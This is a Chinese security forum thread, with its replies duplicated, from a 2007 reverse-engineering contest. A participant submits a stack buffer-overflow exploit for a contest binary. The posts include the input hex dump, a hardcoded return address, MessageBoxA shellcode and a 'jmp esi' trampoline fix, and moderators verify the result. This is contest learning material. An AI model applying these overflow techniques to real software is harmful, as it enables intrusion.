[原创]第二阶段第一题答案提交-1)珠海金山2007逆向分析挑战赛-看雪-安全社区|安全招聘|kanxue.com

最新回复 (13)
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 15:22 2 楼 0 原来是大写的，还有个感叹号 :( 改三个字节就行了。上传的附件： test.txt （0.05kb，8次下载）
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 15:28 3 楼 0 其实第二次提交和第一次原理一样的： Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 00000000 B5 33 00 00 99 14 00 00 4F 4B 21 00 00 00 00 00 µ3..™...OK!..... 00000016 83 EC 2C 6A 00 8D 44 24 04 50 50 6A 00 E8 F8 09 ƒì,j.D$.PPj.èø. 00000032 32 7E 83 C4 4C 5D C3 00 00 00 00 00 00 00 00 00 2~ƒÄL]Ã......... 00000048 80 FB 12 00 €û.. 偏移 8,9,10 处是 "ok" 字符串，第一次提交写的是小写，第二次改成大写，后面加了个感叹号 (0x21).
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 15:38 4 楼 0 溢出后返回到堆栈一个地址。这个地址我是硬编码进去的，希望在其它机器上这个值一样。
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 15:40 5 楼 0 溢出后返回到的地址：12FB80 ShellCode 代码： 0012FB80 83EC 2C SUB ESP,2C 0012FB83 6A 00 PUSH 0 0012FB85 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] 0012FB89 50 PUSH EAX 0012FB8A 50 PUSH EAX 0012FB8B 6A 00 PUSH 0 0012FB8D E8 F809327E CALL USER32.MessageBoxA 0012FB92 83C4 4C ADD ESP,4C 0012FB95 5D POP EBP 0012FB96 C3 RETN
kanxue 雪币： 32408 活跃值： (18770) 能力值： (RANK：350 ) 在线值：发帖 1827 回帖 15215 粉丝 487 关注私信	kanxue 8 2007-8-28 15:43 6 楼 0 单击按钮后，直接崩溃
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 17:25 7 楼 0 还能再提交吗？最后一次，没其它环境测试。上传的附件： test.txt （0.05kb，4次下载）
kanxue 雪币： 32408 活跃值： (18770) 能力值： (RANK：350 ) 在线值：发帖 1827 回帖 15215 粉丝 487 关注私信	kanxue 8 2007-8-28 17:31 8 楼 0 还是没通过，直接崩溃。你思路有问题，这题可以做到与系统无关的。
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 17:33 9 楼 0 我知道了。我选择了 kernel32.dll 中的 jmp esi. 应该选择 ExploitMe.exe 里的 jmp esi. 算了，已经满两次了。
kanxue 雪币： 32408 活跃值： (18770) 能力值： (RANK：350 ) 在线值：发帖 1827 回帖 15215 粉丝 487 关注私信	kanxue 8 2007-8-28 18:27 10 楼 0 你可能没细看规则，附件可以允许多次提交的，只是每提交一次，减5分。
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 19:17 11 楼 0 哦.理解错了.我以为只能两次. 再次提交. 这个应该正常,且可以反复溢出. 上传的附件： test.txt （0.05kb，13次下载）
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 184 回帖 3569 粉丝 21 关注私信	笨笨雄 14 2007-8-28 19:57 12 楼 0 验证通过~~
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 21:30 13 楼 0 总算过了. Thanks~~ 受益非浅. 期待后面的题目更精彩
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 184 回帖 3569 粉丝 21 关注私信	笨笨雄 14 2007-9-2 21:18 14 楼 0 123.1518639034595146348511616371
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

最新回复 (13)
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 15:22 2 楼 0 原来是大写的，还有个感叹号 :( 改三个字节就行了。上传的附件： test.txt （0.05kb，8次下载）
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 15:28 3 楼 0 其实第二次提交和第一次原理一样的： Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 00000000 B5 33 00 00 99 14 00 00 4F 4B 21 00 00 00 00 00 µ3..™...OK!..... 00000016 83 EC 2C 6A 00 8D 44 24 04 50 50 6A 00 E8 F8 09 ƒì,j.D$.PPj.èø. 00000032 32 7E 83 C4 4C 5D C3 00 00 00 00 00 00 00 00 00 2~ƒÄL]Ã......... 00000048 80 FB 12 00 €û.. 偏移 8,9,10 处是 "ok" 字符串，第一次提交写的是小写，第二次改成大写，后面加了个感叹号 (0x21).
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 15:38 4 楼 0 溢出后返回到堆栈一个地址。这个地址我是硬编码进去的，希望在其它机器上这个值一样。
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 15:40 5 楼 0 溢出后返回到的地址：12FB80 ShellCode 代码： 0012FB80 83EC 2C SUB ESP,2C 0012FB83 6A 00 PUSH 0 0012FB85 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] 0012FB89 50 PUSH EAX 0012FB8A 50 PUSH EAX 0012FB8B 6A 00 PUSH 0 0012FB8D E8 F809327E CALL USER32.MessageBoxA 0012FB92 83C4 4C ADD ESP,4C 0012FB95 5D POP EBP 0012FB96 C3 RETN
kanxue 雪币： 32408 活跃值： (18770) 能力值： (RANK：350 ) 在线值：发帖 1827 回帖 15215 粉丝 487 关注私信	kanxue 8 2007-8-28 15:43 6 楼 0 单击按钮后，直接崩溃
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 17:25 7 楼 0 还能再提交吗？最后一次，没其它环境测试。上传的附件： test.txt （0.05kb，4次下载）
kanxue 雪币： 32408 活跃值： (18770) 能力值： (RANK：350 ) 在线值：发帖 1827 回帖 15215 粉丝 487 关注私信	kanxue 8 2007-8-28 17:31 8 楼 0 还是没通过，直接崩溃。你思路有问题，这题可以做到与系统无关的。
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 17:33 9 楼 0 我知道了。我选择了 kernel32.dll 中的 jmp esi. 应该选择 ExploitMe.exe 里的 jmp esi. 算了，已经满两次了。
kanxue 雪币： 32408 活跃值： (18770) 能力值： (RANK：350 ) 在线值：发帖 1827 回帖 15215 粉丝 487 关注私信	kanxue 8 2007-8-28 18:27 10 楼 0 你可能没细看规则，附件可以允许多次提交的，只是每提交一次，减5分。
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 19:17 11 楼 0 哦.理解错了.我以为只能两次. 再次提交. 这个应该正常,且可以反复溢出. 上传的附件： test.txt （0.05kb，13次下载）
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 184 回帖 3569 粉丝 21 关注私信	笨笨雄 14 2007-8-28 19:57 12 楼 0 验证通过~~
null 雪币： 109 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 54 粉丝 1 关注私信	null 1 2007-8-28 21:30 13 楼 0 总算过了. Thanks~~ 受益非浅. 期待后面的题目更精彩
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 184 回帖 3569 粉丝 21 关注私信	笨笨雄 14 2007-9-2 21:18 14 楼 0 123.1518639034595146348511616371
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

[原创]第二阶段第一题 答案提交

[原创]第二阶段第一题答案提交